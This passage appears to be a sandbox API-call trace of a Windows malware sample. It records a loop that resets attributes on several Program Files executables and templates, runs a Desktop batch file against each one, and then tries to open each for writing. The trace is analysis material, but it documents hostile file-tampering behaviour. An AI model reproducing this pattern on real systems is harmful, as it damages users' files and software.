Files\\MSBuild\\executed_florists.exe", dwFileAttributes=0x80) returned 1 [0099.490] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\executed_florists.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\executed_florists.exe\"", lpProcessInformation=0x36df864*(hProcess=0x1e8, hThread=0x1e4, dwProcessId=0x7b0, dwThreadId=0x570)) returned 1 [0099.505] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1388) returned 0x102 [0118.222] CloseHandle (hObject=0x1e8) returned 1 [0118.222] CloseHandle (hObject=0x1e4) returned 1 [0118.222] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\executed_florists.exe" (normalized: "c:\\program files\\msbuild\\executed_florists.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.223] GetFullPathNameW (in: lpFileName="C:\\Program Files\\MSBuild\\executed_florists.exe", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\MSBuild\\executed_florists.exe", lpFilePart=0x36df648*="executed_florists.exe") returned 0x2e [0118.223] GetLastError () returned 0x20 [0118.223] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="?iͭ폈Hͭ퐔Hͭ") returned 0x51 [0118.223] LocalFree (hMem=0x69df18) returned 0x0 [0118.223] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0118.223] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0118.223] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0118.224] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0118.224] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\blank.jtp", dwFileAttributes=0x80) returned 0 [0118.227] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\"", lpProcessInformation=0x36df864*(hProcess=0x1e8, hThread=0x1e4, dwProcessId=0xb10, dwThreadId=0xa90)) returned 1 [0118.714] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1388) returned 0x102 [0132.227] CloseHandle (hObject=0x1e8) returned 1 [0132.227] CloseHandle (hObject=0x1e4) returned 1 [0132.227] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\blank.jtp" (normalized: "c:\\program files\\windows journal\\templates\\blank.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0132.292] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\blank.jtp", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\blank.jtp", lpFilePart=0x36df648*="blank.jtp") returned 0x34 [0132.292] GetLastError () returned 0x5 [0132.292] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0132.292] LocalFree (hMem=0x69e2b0) returned 0x0 [0132.292] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0132.293] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0132.293] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0132.294] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0132.294] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe", dwFileAttributes=0x80) returned 1 [0132.295] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe\"", lpProcessInformation=0x36df864*(hProcess=0x1e8, hThread=0x1e4, dwProcessId=0x24c, dwThreadId=0x40c)) returned 1 [0132.339] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1388) returned 0x102 [0141.823] CloseHandle (hObject=0x1e8) returned 1 [0141.823] CloseHandle (hObject=0x1e4) returned 1 [0141.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe" (normalized: "c:\\program files\\microsoft analysis services\\spcwin.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Microsoft Analysis Services\\spcwin.exe", lpFilePart=0x36df648*="spcwin.exe") returned 0x37 [0141.824] GetLastError () returned 0x20 [0141.824] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀iͭ폈Hͭ퐔Hͭ") returned 0x51 [0141.825] LocalFree (hMem=0x696c00) returned 0x0 [0141.825] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0141.825] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0141.825] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0141.826] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0141.826] SetFileAttributesW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", dwFileAttributes=0x80) returned 0 [0141.827] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"", lpProcessInformation=0x36df864*(hProcess=0x1e8, hThread=0x1e4, dwProcessId=0x6f4, dwThreadId=0x758)) returned 1 [0141.855] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1388) returned 0x102 [0154.721] CloseHandle (hObject=0x1e8) returned 1 [0154.721] CloseHandle (hObject=0x1e4) returned 1 [0154.721] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.5\\workflow.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0154.721] GetFullPathNameW (in: lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets", lpFilePart=0x36df648*="Workflow.Targets") returned 0x54 [0154.721] GetLastError () returned 0x5 [0154.722] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0154.722] LocalFree (hMem=0x69e2b0) returned 0x0 [0154.722] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0154.722] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0154.722] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0154.723] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0154.723] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", dwFileAttributes=0x80) returned 0 [0154.723] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0x598, dwThreadId=0x30c)) returned 1 [0155.570] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0163.077] CloseHandle (hObject=0x208) returned 1 [0163.077] CloseHandle (hObject=0x1e8) returned 1 [0163.078] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp" (normalized: "c:\\program files\\windows journal\\templates\\seyes.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0163.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp", lpFilePart=0x36df648*="Seyes.jtp") returned 0x34 [0163.078] GetLastError () returned 0x5 [0163.078] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0163.079] LocalFree (hMem=0x69e2b0) returned 0x0 [0163.079] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0163.079] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0163.079] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0163.079] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0163.080] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Mail\\wabmig.exe", dwFileAttributes=0x80) returned 0 [0163.080] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\wabmig.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\wabmig.exe\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0x710, dwThreadId=0x85c)) returned 1 [0163.176] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0170.102] CloseHandle (hObject=0x208) returned 1 [0170.102] CloseHandle (hObject=0x1e8) returned 1 [0170.102] CreateFileW (lpFileName="C:\\Program Files\\Windows Mail\\wabmig.exe" (normalized: "c:\\program files\\windows mail\\wabmig.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0170.102] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Mail\\wabmig.exe", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Mail\\wabmig.exe", lpFilePart=0x36df648*="wabmig.exe") returned 0x28 [0170.103] GetLastError () returned 0x5 [0170.103] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0170.103] LocalFree (hMem=0x69e2b0) returned 0x0 [0170.103] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0170.103] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0170.104] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0170.104] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0170.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Portable Devices\\thunderbird.exe", dwFileAttributes=0x80) returned 1 [0170.105] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Portable Devices\\thunderbird.exe\"", lpProcessInformation=0x36df864*(hProcess=0x208, hThread=0x1e8, dwProcessId=0xa18, dwThreadId=0x7c4)) returned 1 [0170.124] WaitForSingleObject (hHandle=0x208, dwMilliseconds=0x1388) returned 0x102 [0175.806] CloseHandle (hObject=0x208) returned 1 [0175.806] CloseHandle (hObject=0x1e8) returned 1 [0175.806] CreateFileW (lpFileName="C:\\Program Files\\Windows Portable Devices\\thunderbird.exe" (normalized: "c:\\program files\\windows portable devices\\thunderbird.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0175.806] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\thunderbird.exe", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Portable Devices\\thunderbird.exe", lpFilePart=0x36df648*="thunderbird.exe") returned 0x39 [0175.806] GetLastError () returned 0x20 [0175.806] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="쓸iͭ폈Hͭ퐔Hͭ") returned 0x51 [0175.806] LocalFree (hMem=0x69c4f8) returned 0x0 [0175.806] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0175.807] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0175.807] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0175.807] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0175.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\component.exe", dwFileAttributes=0x80) returned 1 [0176.014] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\component.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\component.exe\"", lpProcessInformation=0x36df864*(hProcess=0x20c, hThread=0x1e8, dwProcessId=0x6b8, dwThreadId=0xb24)) returned 1 [0176.091] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1388) returned 0x102 [0182.714] CloseHandle (hObject=0x20c) returned 1 [0182.714] CloseHandle (hObject=0x1e8) returned 1 [0182.714] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\component.exe" (normalized: "c:\\program files\\windows journal\\component.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.719] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\component.exe", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Journal\\component.exe", lpFilePart=0x36df648*="component.exe") returned 0x2e [0182.719] GetLastError () returned 0x20 [0182.719] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="줘iͭ폈Hͭ퐔Hͭ") returned 0x51 [0182.719] LocalFree (hMem=0x69c918) returned 0x0 [0182.719] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0182.719] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0182.721] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0182.722] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0182.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Journal.exe", dwFileAttributes=0x80) returned 0 [0182.723] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Journal.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Journal.exe\"", lpProcessInformation=0x36df864*(hProcess=0x20c, hThread=0x1e8, dwProcessId=0x74c, dwThreadId=0x99c)) returned 1 [0182.760] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1388) returned 0x102 [0188.053] CloseHandle (hObject=0x20c) returned 1 [0188.053] CloseHandle (hObject=0x1e8) returned 1 [0188.053] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Journal.exe" (normalized: "c:\\program files\\windows journal\\journal.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.054] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Journal.exe", nBufferLength=0x104, lpBuffer=0x36df64c, lpFilePart=0x36df648 | out: lpBuffer="C:\\Program Files\\Windows Journal\\Journal.exe", lpFilePart=0x36df648*="Journal.exe") returned 0x2c [0188.054] GetLastError () returned 0x5 [0188.054] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x36df85c, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͭ폈Hͭ퐔Hͭ") returned 0x13 [0188.054] LocalFree (hMem=0x69e2b0) returned 0x0 [0188.054] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x36dd818, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0188.054] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x36df84c) [0188.054] RtlUnwind (TargetFrame=0x36df8b4, TargetIp=0x406ffc, ExceptionRecord=0x36df330, ReturnValue=0x0) [0188.055] RtlUnwind (TargetFrame=0x36df8d8, TargetIp=0x407184, ExceptionRecord=0x36df330, ReturnValue=0x0) [0188.055] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp", dwFileAttributes=0x80) returned 0 [0188.056] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x36df874*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x36df864 | out: lpCommandLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\"", lpProcessInformation=0x36df864*(hProcess=0x20c, hThread=0x1e8, dwProcessId=0xaec, dwThreadId=0x5b4)) returned 1 [0188.161] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1388) returned 0x102 [0193.837] CloseHandle (hObject=0x20c) returned 1 [0194.129] CloseHandle (hObject=0x1e8) returned 1 [0194.129] CreateFileW (lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp" (normalized: "c:\\program files\\windows journal\\templates\\month_calendar.jtp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0194.130] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp", nBufferLength=0x104, lpBuffer=0x36df64c, 